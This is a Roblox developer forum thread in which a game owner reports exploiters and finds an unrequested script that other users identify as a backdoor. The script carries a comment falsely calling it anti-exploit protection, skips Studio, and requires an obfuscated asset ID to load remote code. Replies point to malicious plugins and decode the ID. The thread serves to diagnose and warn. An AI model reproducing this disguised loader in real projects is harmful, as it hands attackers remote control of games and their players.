Exploiting Problems & Script Execution

Greetings.

Recently on my SCPF I have had some issues with exploiters where they can execute very lethal scripts on my game.

I dont know how they are managing to do this being I am not using free models or anything that can be used to infect my game. The only free model I used is the coffee machine verified by roblox.

Does anyone know how people are executing these scripts.

I recognise some of the scripts as 'Star Destroy* scripts. the ones where you turn yourself into an angel. If anyone has any reccomendations on how to find or remove anything in my studio which could be contributing towards exploiters, then please reply.

They also somehow have a script which can disable adonis admin, and I am unaware on how to resolve this.

Thank you.

3 Likes

This is not caused by any script in your game (most of the time). To patch alot of the exploits i recommend to set your game to R15 and add a anti exploit. Alot of the exploits are built for R6 so having a R15 game will cause an error in most R6 exploits

My game is already R15, Do you reccomend any good anti exploits to add?

I don’t know which anti exploit is good since i barely add them. I recommend to just create your own anti exploit as its harder to crack for exploiters.

I have just fount something in my workspace.


--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.

--Thanks.

if not game:GetService("RunService"):IsStudio() then
require((397.86020086+0.00000400)*9305953)
end
	

I dont know what this is, but I did not add it, can someone help me figure out whats adding these scripts and what they are doing?

Here is the module that it is requiring.

Might be a backdoor. Do you have any plugins?

Yeah, I do have plugins do you want a list of all the ones I currently have?


https://gyazo.com/be38d8435d7067de0414c83a25fdfd46


https://gyazo.com/7092d4b588af4a791de5cd613bea8c2e


https://gyazo.com/891652501b7e4ac6226c1696b729d84c


https://gyazo.com/ae20a48f41cb1adf356c7c6c9dff564f

Just try disabling them all and re-publish and see if the game still works and if so check if the script you mentioned is still there.

1 Like

This kind of thread appears at least once every week or so on the DevForum and it’s the same problem every time. You have a backdoor or vulnerability in your game that you need to go back, search for and fix.

Start checking your plugins and scanning your game for unwanted requires or scripts that you do not believe belong in your game and remove them. If others have access to your game, they need to check their plugins as well.

I already scanned through all my scripts and searched for all the requires()'s that I use and its nothing that isnt meant to be there.

So my best guess is the plugins.

Probably a free model, or plugin you have.

Yet, I am not a free modeller. so like I said, my best bet is the plugins.

Have you inserted any free-models (do not be ashamed to say, we’ve all done it at one point in our developing lifetimes)? You could make a script which deletes that fishy one, if you cannot solve the problem. Have a search for some antiviruses, there’s loads. As Colbert said check your plugins, the most fishy one there looks like GUI Scale/Offset converter. Anyway have a clean and see what the antivirus returns.

Here’s some antiviruses which I’ve found for you:

Uninstall plugins you don’t use or you don’t feel safe with them

Yeah, I have uninstalled the ones I dont use most, or the ones that are the most fishy and it seems to have fixed the issue. thanks for the advise.

I’d say to prevent some exploits or back doors is to know the developer and trust them or don’t use free models because they can have back doors in them as well.

Just wanted to bump this thread for awareness in-case anyone else is having this same issue.

This is INDEED a BACKDOOR!

Q: Is this backdoor still being used for exploiters?
A: More than likely, yes. If you do the math for the require part of the script …

(397.86020086+0.00000400)*9305953

This equals 3702468367 (rounded up and minus the commas).

Q: Ok, but what does this number mean?
A: This number (to my knowledge) is an asset ID and is indeed another plugin. I will link the plugin below.

I DO NOT RECOMMEND YOU INSTALL AND USE THIS!

If you notice, the plugins owner is terminated from ROBLOX. This doesn’t fix the issue at hand.

The real issue here… where is it coming from?

Now, as I stated… I too got this and I believe its from a plugin.

Q: Which plugin is that?
A: I’m currently testing my plugins individually to find which one, it seems to place the script in a Part within Workspace every hour or so.

My current plugins are as shown below:


https://gyazo.com/fc296701ca0ac4bbf70cff3bf689900f


https://gyazo.com/13ec8fceb833354587f1977269915b9e


https://gyazo.com/460fae2880cfcf384709b7af2becbb4e


https://gyazo.com/c05ae699f7d3474be8edc27b8c341a20

I will let y’all know when I find which out which plugin it is.

Edit #1: The script names I’ve encountered that had the backdoor in it were named… Fix, Debounce and Welding (in that order from when I started noticing them).

2 Likes